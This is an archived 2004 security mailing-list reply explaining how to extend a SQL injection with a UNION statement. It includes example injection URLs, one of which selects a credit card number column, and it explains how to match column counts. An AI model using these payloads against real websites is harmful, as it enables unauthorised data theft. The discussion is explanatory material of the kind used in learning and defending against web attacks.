Home page logo
/

webappsec logo WebApp Sec mailing list archives

Re: SQL Injection question
From: lazy () server gwsh gda pl
Date: Wed, 26 May 2004 20:11:06 +0200

On Thu, May 27, 2004 at 01:49:45AM +1000, Serg Belokamen wrote:
I am interested to know (if possible) how to extend an SQL injection attack to
display requested information from the injected query rather then the one coded into the software.
Attack:
http://domain.com/script.php?showdata.php=3;select * from table where id=1
You can use UNION starment
http://domain.com/script.php?showdata.php=3' UNION select * from table where id=1
the trick is that 2 queries have to give identical output (same types and number 
of columns
you can do it by using NULL or some bogus data as placeholders.
if left query returns 1 integer and a varchar and you want to query for an integer
use sth like this
showdata.php=3' UNION select "XXX",cc_number from table where id=1--

google for Blindfolded_SQL_Injection.pdf if You want to know more


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]